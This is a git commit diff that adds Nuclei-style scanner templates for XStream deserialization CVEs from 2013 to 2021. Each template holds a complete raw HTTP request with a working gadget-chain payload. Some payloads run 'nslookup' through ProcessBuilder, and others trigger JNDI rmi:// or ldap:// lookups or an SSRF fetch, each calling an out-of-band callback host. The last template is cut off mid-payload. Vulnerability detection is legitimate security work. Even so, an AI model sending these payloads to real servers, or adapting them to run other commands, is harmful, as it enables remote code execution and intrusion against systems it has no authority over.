xstream-ssrf-rce
pwnhxl
parent
ed6d6638ca
commit
d1cfaa0a7b
|
|
@ -0,0 +1,36 @@
|
|||
id: CVE-2013-7285
|
||||
|
||||
info:
|
||||
name: CVE-2013-7285
|
||||
author: pwnhxl
|
||||
severity: high
|
||||
description: The processed stream at unmarshalling time contains type information to recreate the formerly written objects. XStream creates therefore new instances based on these type information. An attacker can manipulate the processed input stream and replace or inject objects, that can execute arbitrary shell commands.
|
||||
reference:
|
||||
- http://x-stream.github.io/CVE-2013-7285.html
|
||||
tags: cve,cve-2013,xstream,deserialization,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/xml
|
||||
|
||||
<contact class='dynamic-proxy'>
|
||||
<interface>org.company.model.Contact</interface>
|
||||
<handler class='java.beans.EventHandler'>
|
||||
<target class='java.lang.ProcessBuilder'>
|
||||
<command>
|
||||
<string>nslookup {{interactsh-url}}</string>
|
||||
</command>
|
||||
</target>
|
||||
<action>start</action>
|
||||
</handler>
|
||||
</contact>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "dns"
|
||||
|
|
@ -0,0 +1,77 @@
|
|||
id: CVE-2020-26217
|
||||
|
||||
info:
|
||||
name: CVE-2020-26217
|
||||
author: pwnhxl
|
||||
severity: high
|
||||
description: All versions until and including version 1.4.13 are affected, if using the version out of the box. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist.
|
||||
reference:
|
||||
- https://x-stream.github.io/CVE-2020-26217.html
|
||||
tags: cve,cve-2020,xstream,deserialization,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/xml
|
||||
|
||||
<map>
|
||||
<entry>
|
||||
<jdk.nashorn.internal.objects.NativeString>
|
||||
<flags>0</flags>
|
||||
<value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
|
||||
<dataHandler>
|
||||
<dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
|
||||
<contentType>text/plain</contentType>
|
||||
<is class='java.io.SequenceInputStream'>
|
||||
<e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
|
||||
<iterator class='javax.imageio.spi.FilterIterator'>
|
||||
<iter class='java.util.ArrayList$Itr'>
|
||||
<cursor>0</cursor>
|
||||
<lastRet>-1</lastRet>
|
||||
<expectedModCount>1</expectedModCount>
|
||||
<outer-class>
|
||||
<java.lang.ProcessBuilder>
|
||||
<command>
|
||||
<string>nslookup {{interactsh-url}}</string>
|
||||
</command>
|
||||
</java.lang.ProcessBuilder>
|
||||
</outer-class>
|
||||
</iter>
|
||||
<filter class='javax.imageio.ImageIO$ContainsFilter'>
|
||||
<method>
|
||||
<class>java.lang.ProcessBuilder</class>
|
||||
<name>start</name>
|
||||
<parameter-types/>
|
||||
</method>
|
||||
<name>start</name>
|
||||
</filter>
|
||||
<next/>
|
||||
</iterator>
|
||||
<type>KEYS</type>
|
||||
</e>
|
||||
<in class='java.io.ByteArrayInputStream'>
|
||||
<buf></buf>
|
||||
<pos>0</pos>
|
||||
<mark>0</mark>
|
||||
<count>0</count>
|
||||
</in>
|
||||
</is>
|
||||
<consumed>false</consumed>
|
||||
</dataSource>
|
||||
<transferFlavors/>
|
||||
</dataHandler>
|
||||
<dataLen>0</dataLen>
|
||||
</value>
|
||||
</jdk.nashorn.internal.objects.NativeString>
|
||||
<string>test</string>
|
||||
</entry>
|
||||
</map>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "dns"
|
||||
|
|
@ -0,0 +1,44 @@
|
|||
id: CVE-2020-26258
|
||||
|
||||
info:
|
||||
name: CVE-2020-26258
|
||||
author: pwnhxl
|
||||
severity: high
|
||||
description: The processed stream at unmarshalling time contains type information to recreate the formerly written objects. XStream creates therefore new instances based on these type information. An attacker can manipulate the processed input stream and replace or inject objects, that result in a server-side forgery request.
|
||||
reference:
|
||||
- https://x-stream.github.io/CVE-2020-26258.html
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26258
|
||||
tags: cve,cve-2020,xstream,ssrf
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/xml
|
||||
Content-Length: 540
|
||||
|
||||
<map>
|
||||
<entry>
|
||||
<jdk.nashorn.internal.objects.NativeString>
|
||||
<flags>0</flags>
|
||||
<value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
|
||||
<dataHandler>
|
||||
<dataSource class='javax.activation.URLDataSource'>
|
||||
<url>http://{{interactsh-url}}/internal/:</url>
|
||||
</dataSource>
|
||||
<transferFlavors/>
|
||||
</dataHandler>
|
||||
<dataLen>0</dataLen>
|
||||
</value>
|
||||
</jdk.nashorn.internal.objects.NativeString>
|
||||
<string>test</string>
|
||||
</entry>
|
||||
</map>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "http"
|
||||
|
|
@ -0,0 +1,128 @@
|
|||
id: CVE-2021-21344
|
||||
|
||||
info:
|
||||
name: CVE-2021-21344
|
||||
author: pwnhxl
|
||||
severity: high
|
||||
description: The processed stream at unmarshalling time contains type information to recreate the formerly written objects. XStream creates therefore new instances based on these type information. An attacker can manipulate the processed input stream and replace or inject objects, that result in execution of arbitrary code loaded from a remote server.
|
||||
reference:
|
||||
- https://x-stream.github.io/CVE-2021-21344.html
|
||||
tags: cve,cve-2021,xstream,deserialization,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/xml
|
||||
|
||||
<java.util.PriorityQueue serialization='custom'>
|
||||
<unserializable-parents/>
|
||||
<java.util.PriorityQueue>
|
||||
<default>
|
||||
<size>2</size>
|
||||
<comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>
|
||||
<indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>
|
||||
<packet>
|
||||
<message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>
|
||||
<dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'>
|
||||
<bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'>
|
||||
<bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'>
|
||||
<bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'>
|
||||
<jaxbType>com.sun.rowset.JdbcRowSetImpl</jaxbType>
|
||||
<uriProperties/>
|
||||
<attributeProperties/>
|
||||
<inheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'>
|
||||
<getter>
|
||||
<class>com.sun.rowset.JdbcRowSetImpl</class>
|
||||
<name>getDatabaseMetaData</name>
|
||||
<parameter-types/>
|
||||
</getter>
|
||||
</inheritedAttWildcard>
|
||||
</bi>
|
||||
<tagName/>
|
||||
<context>
|
||||
<marshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'>
|
||||
<outer-class reference='../..'/>
|
||||
</marshallerPool>
|
||||
<nameList>
|
||||
<nsUriCannotBeDefaulted>
|
||||
<boolean>true</boolean>
|
||||
</nsUriCannotBeDefaulted>
|
||||
<namespaceURIs>
|
||||
<string>1</string>
|
||||
</namespaceURIs>
|
||||
<localNames>
|
||||
<string>UTF-8</string>
|
||||
</localNames>
|
||||
</nameList>
|
||||
</context>
|
||||
</bridge>
|
||||
</bridge>
|
||||
<jaxbObject class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>
|
||||
<javax.sql.rowset.BaseRowSet>
|
||||
<default>
|
||||
<concurrency>1008</concurrency>
|
||||
<escapeProcessing>true</escapeProcessing>
|
||||
<fetchDir>1000</fetchDir>
|
||||
<fetchSize>0</fetchSize>
|
||||
<isolation>2</isolation>
|
||||
<maxFieldSize>0</maxFieldSize>
|
||||
<maxRows>0</maxRows>
|
||||
<queryTimeout>0</queryTimeout>
|
||||
<readOnly>true</readOnly>
|
||||
<rowSetType>1004</rowSetType>
|
||||
<showDeleted>false</showDeleted>
|
||||
<dataSource>rmi://localhost:15000/CallRemoteMethod</dataSource>
|
||||
<params/>
|
||||
</default>
|
||||
</javax.sql.rowset.BaseRowSet>
|
||||
<com.sun.rowset.JdbcRowSetImpl>
|
||||
<default>
|
||||
<iMatchColumns>
|
||||
<int>-1</int>
|
||||
<int>-1</int>
|
||||
<int>-1</int>
|
||||
<int>-1</int>
|
||||
<int>-1</int>
|
||||
<int>-1</int>
|
||||
<int>-1</int>
|
||||
<int>-1</int>
|
||||
<int>-1</int>
|
||||
<int>-1</int>
|
||||
</iMatchColumns>
|
||||
<strMatchColumns>
|
||||
<string>foo</string>
|
||||
<null/>
|
||||
<null/>
|
||||
<null/>
|
||||
<null/>
|
||||
<null/>
|
||||
<null/>
|
||||
<null/>
|
||||
<null/>
|
||||
<null/>
|
||||
</strMatchColumns>
|
||||
</default>
|
||||
</com.sun.rowset.JdbcRowSetImpl>
|
||||
</jaxbObject>
|
||||
</dataSource>
|
||||
</message>
|
||||
<satellites/>
|
||||
<invocationProperties/>
|
||||
</packet>
|
||||
</indexMap>
|
||||
</comparator>
|
||||
</default>
|
||||
<int>3</int>
|
||||
<string>javax.xml.ws.binding.attachments.inbound</string>
|
||||
<string>javax.xml.ws.binding.attachments.inbound</string>
|
||||
</java.util.PriorityQueue>
|
||||
</java.util.PriorityQueue>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "dns"
|
||||
|
|
@ -0,0 +1,85 @@
|
|||
id: CVE-2021-21345
|
||||
|
||||
info:
|
||||
name: CVE-2021-21345
|
||||
author: pwnhxl
|
||||
severity: high
|
||||
description: All versions until and including version 1.4.15 are affected, if using the version out of the box. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.
|
||||
reference:
|
||||
- https://x-stream.github.io/CVE-2021-21345.html
|
||||
tags: cve,cve-2021,xstream,deserialization,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/xml
|
||||
Content-Length: 2799
|
||||
|
||||
<java.util.PriorityQueue serialization='custom'>
|
||||
<unserializable-parents/>
|
||||
<java.util.PriorityQueue>
|
||||
<default>
|
||||
<size>2</size>
|
||||
<comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>
|
||||
<indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>
|
||||
<packet>
|
||||
<message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>
|
||||
<dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'>
|
||||
<bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'>
|
||||
<bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'>
|
||||
<bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'>
|
||||
<jaxbType>com.sun.corba.se.impl.activation.ServerTableEntry</jaxbType>
|
||||
<uriProperties/>
|
||||
<attributeProperties/>
|
||||
<inheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'>
|
||||
<getter>
|
||||
<class>com.sun.corba.se.impl.activation.ServerTableEntry</class>
|
||||
<name>verify</name>
|
||||
<parameter-types/>
|
||||
</getter>
|
||||
</inheritedAttWildcard>
|
||||
</bi>
|
||||
<tagName/>
|
||||
<context>
|
||||
<marshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'>
|
||||
<outer-class reference='../..'/>
|
||||
</marshallerPool>
|
||||
<nameList>
|
||||
<nsUriCannotBeDefaulted>
|
||||
<boolean>true</boolean>
|
||||
</nsUriCannotBeDefaulted>
|
||||
<namespaceURIs>
|
||||
<string>1</string>
|
||||
</namespaceURIs>
|
||||
<localNames>
|
||||
<string>UTF-8</string>
|
||||
</localNames>
|
||||
</nameList>
|
||||
</context>
|
||||
</bridge>
|
||||
</bridge>
|
||||
<jaxbObject class='com.sun.corba.se.impl.activation.ServerTableEntry'>
|
||||
<activationCmd>nslookup {{interactsh-url}}</activationCmd>
|
||||
</jaxbObject>
|
||||
</dataSource>
|
||||
</message>
|
||||
<satellites/>
|
||||
<invocationProperties/>
|
||||
</packet>
|
||||
</indexMap>
|
||||
</comparator>
|
||||
</default>
|
||||
<int>3</int>
|
||||
<string>javax.xml.ws.binding.attachments.inbound</string>
|
||||
<string>javax.xml.ws.binding.attachments.inbound</string>
|
||||
</java.util.PriorityQueue>
|
||||
</java.util.PriorityQueue>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "dns"
|
||||
|
|
@ -0,0 +1,101 @@
|
|||
id: CVE-2021-21351
|
||||
|
||||
info:
|
||||
name: CVE-2021-21351
|
||||
author: pwnhxl
|
||||
severity: high
|
||||
description: XStream uses a blocklist mechanism when parsing XML text which is utilized to defend against deserialization vulnerabilities, but in 1.4.15 and earlier, blocklists are incomplete and attackers could use javax.naming.ldap.Rdn$RdnEntry and javax.sql.rowset.BaseRowSet to make an JNDI injection and execute arbitrary commands finally.
|
||||
reference:
|
||||
- https://github.com/vulhub/vulhub/tree/master/xstream/CVE-2021-21351
|
||||
- https://x-stream.github.io/CVE-2021-21351.html
|
||||
- https://paper.seebug.org/1543/
|
||||
tags: cve,cve-2021,xstream,deserialization,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/xml
|
||||
|
||||
<sorted-set>
|
||||
<javax.naming.ldap.Rdn_-RdnEntry>
|
||||
<type>ysomap</type>
|
||||
<value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'>
|
||||
<m__DTMXRTreeFrag>
|
||||
<m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'>
|
||||
<m__size>-10086</m__size>
|
||||
<m__mgrDefault>
|
||||
<__overrideDefaultParser>false</__overrideDefaultParser>
|
||||
<m__incremental>false</m__incremental>
|
||||
<m__source__location>false</m__source__location>
|
||||
<m__dtms>
|
||||
<null/>
|
||||
</m__dtms>
|
||||
<m__defaultHandler/>
|
||||
</m__mgrDefault>
|
||||
<m__shouldStripWS>false</m__shouldStripWS>
|
||||
<m__indexing>false</m__indexing>
|
||||
<m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'>
|
||||
<fPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>
|
||||
<javax.sql.rowset.BaseRowSet>
|
||||
<default>
|
||||
<concurrency>1008</concurrency>
|
||||
<escapeProcessing>true</escapeProcessing>
|
||||
<fetchDir>1000</fetchDir>
|
||||
<fetchSize>0</fetchSize>
|
||||
<isolation>2</isolation>
|
||||
<maxFieldSize>0</maxFieldSize>
|
||||
<maxRows>0</maxRows>
|
||||
<queryTimeout>0</queryTimeout>
|
||||
<readOnly>true</readOnly>
|
||||
<rowSetType>1004</rowSetType>
|
||||
<showDeleted>false</showDeleted>
|
||||
<dataSource>rmi://{{interactsh-url}}/test</dataSource>
|
||||
<listeners/>
|
||||
<params/>
|
||||
</default>
|
||||
</javax.sql.rowset.BaseRowSet>
|
||||
<com.sun.rowset.JdbcRowSetImpl>
|
||||
<default/>
|
||||
</com.sun.rowset.JdbcRowSetImpl>
|
||||
</fPullParserConfig>
|
||||
<fConfigSetInput>
|
||||
<class>com.sun.rowset.JdbcRowSetImpl</class>
|
||||
<name>setAutoCommit</name>
|
||||
<parameter-types>
|
||||
<class>boolean</class>
|
||||
</parameter-types>
|
||||
</fConfigSetInput>
|
||||
<fConfigParse reference='../fConfigSetInput'/>
|
||||
<fParseInProgress>false</fParseInProgress>
|
||||
</m__incrementalSAXSource>
|
||||
<m__walker>
|
||||
<nextIsRaw>false</nextIsRaw>
|
||||
</m__walker>
|
||||
<m__endDocumentOccured>false</m__endDocumentOccured>
|
||||
<m__idAttributes/>
|
||||
<m__textPendingStart>-1</m__textPendingStart>
|
||||
<m__useSourceLocationProperty>false</m__useSourceLocationProperty>
|
||||
<m__pastFirstElement>false</m__pastFirstElement>
|
||||
</m__dtm>
|
||||
<m__dtmIdentity>1</m__dtmIdentity>
|
||||
</m__DTMXRTreeFrag>
|
||||
<m__dtmRoot>1</m__dtmRoot>
|
||||
<m__allowRelease>false</m__allowRelease>
|
||||
</value>
|
||||
</javax.naming.ldap.Rdn_-RdnEntry>
|
||||
<javax.naming.ldap.Rdn_-RdnEntry>
|
||||
<type>ysomap</type>
|
||||
<value class='com.sun.org.apache.xpath.internal.objects.XString'>
|
||||
<m__obj class='string'>test</m__obj>
|
||||
</value>
|
||||
</javax.naming.ldap.Rdn_-RdnEntry>
|
||||
</sorted-set>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "dns"
|
||||
|
|
@ -0,0 +1,82 @@
|
|||
id: CVE-2021-29505
|
||||
|
||||
info:
|
||||
name: CVE-2021-29505
|
||||
author: pwnhxl
|
||||
severity: high
|
||||
description: All versions until and including version 1.4.16 are affected, if using the version out of the box. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.
|
||||
reference:
|
||||
- https://paper.seebug.org/1543/
|
||||
- https://github.com/vulhub/vulhub/blob/master/xstream/CVE-2021-29505/README.zh-cn.md
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29505
|
||||
tags: cve,cve-2021,xstream,deserialization,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/xml
|
||||
|
||||
<java.util.PriorityQueue serialization='custom'>
|
||||
<unserializable-parents/>
|
||||
<java.util.PriorityQueue>
|
||||
<default>
|
||||
<size>2</size>
|
||||
</default>
|
||||
<int>3</int>
|
||||
<javax.naming.ldap.Rdn_-RdnEntry>
|
||||
<type>12345</type>
|
||||
<value class='com.sun.org.apache.xpath.internal.objects.XString'>
|
||||
<m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>
|
||||
</value>
|
||||
</javax.naming.ldap.Rdn_-RdnEntry>
|
||||
<javax.naming.ldap.Rdn_-RdnEntry>
|
||||
<type>12345</type>
|
||||
<value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
|
||||
<message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
|
||||
<parsedMessage>true</parsedMessage>
|
||||
<soapVersion>SOAP_11</soapVersion>
|
||||
<bodyParts/>
|
||||
<sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
|
||||
<attachmentsInitialized>false</attachmentsInitialized>
|
||||
<nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
|
||||
<aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
|
||||
<candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
|
||||
<names>
|
||||
<string>aa</string>
|
||||
<string>aa</string>
|
||||
</names>
|
||||
<ctx>
|
||||
<environment/>
|
||||
<registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
|
||||
<java.rmi.server.RemoteObject>
|
||||
<string>UnicastRef</string>
|
||||
<string>{{interactsh-url}}</string>
|
||||
<int>1099</int>
|
||||
<long>0</long>
|
||||
<int>0</int>
|
||||
<long>0</long>
|
||||
<short>0</short>
|
||||
<boolean>false</boolean>
|
||||
</java.rmi.server.RemoteObject>
|
||||
</registry>
|
||||
<host>{{interactsh-url}}</host>
|
||||
<port>1099</port>
|
||||
</ctx>
|
||||
</candidates>
|
||||
</aliases>
|
||||
</nullIter>
|
||||
</sm>
|
||||
</message>
|
||||
</value>
|
||||
</javax.naming.ldap.Rdn_-RdnEntry>
|
||||
</java.util.PriorityQueue>
|
||||
</java.util.PriorityQueue>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "dns"
|
||||
|
|
@ -0,0 +1,197 @@
|
|||
id: CVE-2021-39141
|
||||
|
||||
info:
|
||||
name: CVE-2021-39141
|
||||
author: pwnhxl
|
||||
severity: high
|
||||
description: All versions until and including version 1.4.17 are affected, if using the version out of the box. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.
|
||||
reference:
|
||||
- http://x-stream.github.io/CVE-2021-39141.html
|
||||
tags: cve,cve-2021,xstream,deserialization,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/xml
|
||||
|
||||
<java.util.PriorityQueue serialization='custom'>
|
||||
<unserializable-parents/>
|
||||
<java.util.PriorityQueue>
|
||||
<default>
|
||||
<size>2</size>
|
||||
</default>
|
||||
<int>3</int>
|
||||
<dynamic-proxy>
|
||||
<interface>java.lang.Comparable</interface>
|
||||
<handler class='com.sun.xml.internal.ws.client.sei.SEIStub'>
|
||||
<owner/>
|
||||
<managedObjectManagerClosed>false</managedObjectManagerClosed>
|
||||
<databinding class='com.sun.xml.internal.ws.db.DatabindingImpl'>
|
||||
<stubHandlers>
|
||||
<entry>
|
||||
<method>
|
||||
<class>java.lang.Comparable</class>
|
||||
<name>compareTo</name>
|
||||
<parameter-types>
|
||||
<class>java.lang.Object</class>
|
||||
</parameter-types>
|
||||
</method>
|
||||
<com.sun.xml.internal.ws.client.sei.StubHandler>
|
||||
<bodyBuilder class='com.sun.xml.internal.ws.client.sei.BodyBuilder$DocLit'>
|
||||
<indices>
|
||||
<int>0</int>
|
||||
</indices>
|
||||
<getters>
|
||||
<com.sun.xml.internal.ws.client.sei.ValueGetter>PLAIN</com.sun.xml.internal.ws.client.sei.ValueGetter>
|
||||
</getters>
|
||||
<accessors>
|
||||
<com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>
|
||||
<val_-isJAXBElement>false</val_-isJAXBElement>
|
||||
<val_-getter class='com.sun.xml.internal.ws.spi.db.FieldGetter'>
|
||||
<type>int</type>
|
||||
<field>
|
||||
<name>hash</name>
|
||||
<clazz>java.lang.String</clazz>
|
||||
</field>
|
||||
</val_-getter>
|
||||
<val_-isListType>false</val_-isListType>
|
||||
<val_-n>
|
||||
<namespaceURI/>
|
||||
<localPart>hash</localPart>
|
||||
<prefix/>
|
||||
</val_-n>
|
||||
<val_-setter class='com.sun.xml.internal.ws.spi.db.MethodSetter'>
|
||||
<type>java.lang.String</type>
|
||||
<method>
|
||||
<class>javax.naming.InitialContext</class>
|
||||
<name>doLookup</name>
|
||||
<parameter-types>
|
||||
<class>java.lang.String</class>
|
||||
</parameter-types>
|
||||
</method>
|
||||
</val_-setter>
|
||||
<outer-class>
|
||||
<propertySetters>
|
||||
<entry>
|
||||
<string>serialPersistentFields</string>
|
||||
<com.sun.xml.internal.ws.spi.db.FieldSetter>
|
||||
<type>[Ljava.io.ObjectStreamField;</type>
|
||||
<field>
|
||||
<name>serialPersistentFields</name>
|
||||
<clazz>java.lang.String</clazz>
|
||||
</field>
|
||||
</com.sun.xml.internal.ws.spi.db.FieldSetter>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>CASE_INSENSITIVE_ORDER</string>
|
||||
<com.sun.xml.internal.ws.spi.db.FieldSetter>
|
||||
<type>java.util.Comparator</type>
|
||||
<field>
|
||||
<name>CASE_INSENSITIVE_ORDER</name>
|
||||
<clazz>java.lang.String</clazz>
|
||||
</field>
|
||||
</com.sun.xml.internal.ws.spi.db.FieldSetter>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>serialVersionUID</string>
|
||||
<com.sun.xml.internal.ws.spi.db.FieldSetter>
|
||||
<type>long</type>
|
||||
<field>
|
||||
<name>serialVersionUID</name>
|
||||
<clazz>java.lang.String</clazz>
|
||||
</field>
|
||||
</com.sun.xml.internal.ws.spi.db.FieldSetter>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>value</string>
|
||||
<com.sun.xml.internal.ws.spi.db.FieldSetter>
|
||||
<type>[C</type>
|
||||
<field>
|
||||
<name>value</name>
|
||||
<clazz>java.lang.String</clazz>
|
||||
</field>
|
||||
</com.sun.xml.internal.ws.spi.db.FieldSetter>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>hash</string>
|
||||
<com.sun.xml.internal.ws.spi.db.FieldSetter>
|
||||
<type>int</type>
|
||||
<field reference='../../../../../val_-getter/field'/>
|
||||
</com.sun.xml.internal.ws.spi.db.FieldSetter>
|
||||
</entry>
|
||||
</propertySetters>
|
||||
<propertyGetters>
|
||||
<entry>
|
||||
<string>serialPersistentFields</string>
|
||||
<com.sun.xml.internal.ws.spi.db.FieldGetter>
|
||||
<type>[Ljava.io.ObjectStreamField;</type>
|
||||
<field reference='../../../../propertySetters/entry/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
|
||||
</com.sun.xml.internal.ws.spi.db.FieldGetter>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>CASE_INSENSITIVE_ORDER</string>
|
||||
<com.sun.xml.internal.ws.spi.db.FieldGetter>
|
||||
<type>java.util.Comparator</type>
|
||||
<field reference='../../../../propertySetters/entry[2]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
|
||||
</com.sun.xml.internal.ws.spi.db.FieldGetter>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>serialVersionUID</string>
|
||||
<com.sun.xml.internal.ws.spi.db.FieldGetter>
|
||||
<type>long</type>
|
||||
<field reference='../../../../propertySetters/entry[3]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
|
||||
</com.sun.xml.internal.ws.spi.db.FieldGetter>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>value</string>
|
||||
<com.sun.xml.internal.ws.spi.db.FieldGetter>
|
||||
<type>[C</type>
|
||||
<field reference='../../../../propertySetters/entry[4]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
|
||||
</com.sun.xml.internal.ws.spi.db.FieldGetter>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>hash</string>
|
||||
<com.sun.xml.internal.ws.spi.db.FieldGetter reference='../../../../val_-getter'/>
|
||||
</entry>
|
||||
</propertyGetters>
|
||||
<elementLocalNameCollision>false</elementLocalNameCollision>
|
||||
<contentClass>java.lang.String</contentClass>
|
||||
<elementDeclaredTypes/>
|
||||
</outer-class>
|
||||
</com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>
|
||||
</accessors>
|
||||
<wrapper>java.lang.Object</wrapper>
|
||||
<bindingContext class='com.sun.xml.internal.ws.db.glassfish.JAXBRIContextWrapper'/>
|
||||
<dynamicWrapper>false</dynamicWrapper>
|
||||
</bodyBuilder>
|
||||
<isOneWay>false</isOneWay>
|
||||
</com.sun.xml.internal.ws.client.sei.StubHandler>
|
||||
</entry>
|
||||
</stubHandlers>
|
||||
<clientConfig>false</clientConfig>
|
||||
</databinding>
|
||||
<methodHandlers>
|
||||
<entry>
|
||||
<method reference='../../../databinding/stubHandlers/entry/method'/>
|
||||
<com.sun.xml.internal.ws.client.sei.SyncMethodHandler>
|
||||
<owner reference='../../../..'/>
|
||||
<method reference='../../../../databinding/stubHandlers/entry/method'/>
|
||||
<isVoid>false</isVoid>
|
||||
<isOneway>false</isOneway>
|
||||
</com.sun.xml.internal.ws.client.sei.SyncMethodHandler>
|
||||
</entry>
|
||||
</methodHandlers>
|
||||
</handler>
|
||||
</dynamic-proxy>
|
||||
<string>ldap://{{interactsh-url}}/#evil</string>
|
||||
</java.util.PriorityQueue>
|
||||
</java.util.PriorityQueue>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "dns"
|
||||
|
|
@ -0,0 +1,64 @@
|
|||
id: CVE-2021-39144
|
||||
|
||||
info:
|
||||
name: CVE-2021-39144
|
||||
author: pwnhxl
|
||||
severity: high
|
||||
description: All versions until and including version 1.4.17 are affected, if using the version out of the box. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.
|
||||
reference:
|
||||
- http://x-stream.github.io/CVE-2021-39144.html
|
||||
tags: cve,cve-2021,xstream,deserialization,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/xml
|
||||
Content-Length: 1269
|
||||
|
||||
<java.util.PriorityQueue serialization='custom'>
|
||||
<unserializable-parents/>
|
||||
<java.util.PriorityQueue>
|
||||
<default>
|
||||
<size>2</size>
|
||||
</default>
|
||||
<int>3</int>
|
||||
<dynamic-proxy>
|
||||
<interface>java.lang.Comparable</interface>
|
||||
<handler class='sun.tracing.NullProvider'>
|
||||
<active>true</active>
|
||||
<providerType>java.lang.Comparable</providerType>
|
||||
<probes>
|
||||
<entry>
|
||||
<method>
|
||||
<class>java.lang.Comparable</class>
|
||||
<name>compareTo</name>
|
